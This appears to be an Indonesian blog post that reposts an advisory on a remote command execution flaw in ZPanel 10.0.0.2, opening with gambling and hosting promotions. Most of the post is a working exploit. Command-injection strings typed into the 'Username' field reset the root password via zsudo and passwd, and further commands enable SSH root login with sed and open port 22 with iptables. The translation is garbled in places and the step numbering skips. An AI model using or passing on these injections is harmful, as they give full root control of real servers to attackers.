Template by:
Free Blog Templates

Google hack ZPanel 10.0.0.2 Remote Command Execution Vulnerability

Setelah beberapa hari yang lalu Google Hack posting tetang beberapa reviews tentang AGEN BOLA LIGABET88 PROMO BONUS 100% IBCBET SBOBET 368BET, anekahosting.com web hosting murah terbaik di indonesia dan Cari Uang lewat ekiosku.com kali ini akan mempublikasikan vuln dari salah satu web terkemuka yaitu 1337day tentang ZPanel 10.0.0.2 Remote Command Execution Vulnerability.
Salah satu anggota tim ahli kami (shachibista@gmail.com) yang ditugaskan untuk melakukan audit keamanan kode ZPanel telah menemukan follwoing kerentanan keamanan dengan ZPanel 10.0.0.2 yang akan memungkinkan orang untuk meningkat dengan accress akar dan mengakses server dengan siapa pun. itu audit keamanan menyatakan sebagai berikut:

Saya telah meninjau kode ZPanel dan ada remote serius kerentanan eksekusi di "Protect Directory" modul yang memungkinkan siapa pun dengan akses ke halaman (Administrator, Reseller dan Klien secara default) untuk mengeksekusi perintah sewenang-wenang pada shell karena tidak benar (tidak ada) melarikan diri dari masukan pengguna. Langkah-langkah berikut dapat diambil untuk  mereproduksi mengeksploitasi:

1. Login as any user and visit
 
1a. In the "Username" field input (including the initial semicolon and
the final hash):
 
;/etc/zpanel/panel/bin/zsudo "echo 'newpassword'" "| passwd --stdin root" #
 
2. Type any password
 
3. Root password will be set to "newpassword"
 
 
5. In the "Username" field (including initial semicolon and final hash):
 
;/etc/zpanel/panel/bin/zsudo sed '-i "s/#*\(PermitRootLogin\)/\1 yes
\#/" /etc/ssh/*hd*g' #
 
6. This will enable root login,
 
7. Satu dapat mengulangi proses yang sama untuk membuka port 22 melalui iptables (iptables-A  INPUT-p tcp - dport 22-j ACCEPT) dan restart ssh Server (ini akan membutuhkan proses dua kali sebagai internal buffer ukuran perintah zsudo adalah 100 karakter)

Regards
Google Hack